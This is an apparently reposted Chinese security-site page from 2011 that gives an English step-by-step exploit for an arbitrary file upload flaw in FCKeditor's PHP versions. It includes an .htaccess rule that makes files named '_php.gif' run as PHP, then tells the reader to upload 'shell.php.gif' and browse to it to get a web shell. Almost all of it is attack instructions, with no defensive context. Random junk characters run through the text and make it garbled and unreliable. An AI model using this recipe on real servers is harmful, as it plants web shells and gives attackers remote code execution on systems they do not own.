FCKeditor所有php版本Upload上传漏洞; z2 h0 K& F9 z. y" @2 _
作者:佚名 来源:本站整理 发布时间:2011-10-25 7:39:072 E! `3 r1 q- U' I. J4 p" ^8 I B- P
减小字体 增大字体( U% m5 y5 M, q3 |; p% a- M
[+] Title:FCKeditor all versian Arbitrary File Upload Vulnerability
" x `5 g9 Y6 u/ I[+] Date: 2011. O# \- M* N- M6 s5 q
[+] Author : sinesafe.cn* U; [* W5 a& V9 e# l' h
[+] Website : WwW.sinesafe.cn( c* z+ }& E2 w7 A8 _
———————————————————
! ^% x( o& w) ]; u8 e+ ^7 S5 ?1.create a htaccess file:# {7 C q! E3 P, O5 ?7 x/ F
code:9 E7 }# m0 ^& p, S' Z3 ^
<FilesMatch “_php.gif”>/ h1 v2 I. j4 P: C8 u
SetHandler application/x-httpd-php
+ l1 c1 e- g M% r& A. b</FilesMatch>
c' i; D/ {) M8 t/ f) s" R! F4 A3 n3 y9 t( d
2.Now upload this htaccess with FCKeditor.
& a# h& H' _; D# c
; A( n0 O, D) ^/ F! hhttp://www.sinesafe.cn/FCKeditor ... er/upload/test.html
( D) b) c4 F" B+ C/ x9 @. H5 l
# s' S5 u2 E* G8 D, W3 vhttp://www.sinesafe.cn/FCKeditor ... onnectors/test.html
@* j$ G) M. O
4 ~% c1 F- d: I———————————————————————————————-$ J7 J- y$ I: s9 L
3.Now upload shell.php.gif with FCKeditor.3 ?9 E4 i+ ?) o; e) q4 v6 e% u
4.After upload shell.php.gif, the name “shell.php.gif” change to “shell_php.gif” automatically.
" Q7 d3 l* y5 {" H5.http://www.sinesafe.cn/anything/shell_php.gif
8 s, Q- w! U& {6.Now shell is available from server. | - [- Y5 G K) o5 N5 H) p+ c
; M/ }' `1 o1 }% ~( H# E
/ ~# i2 O; H% `
|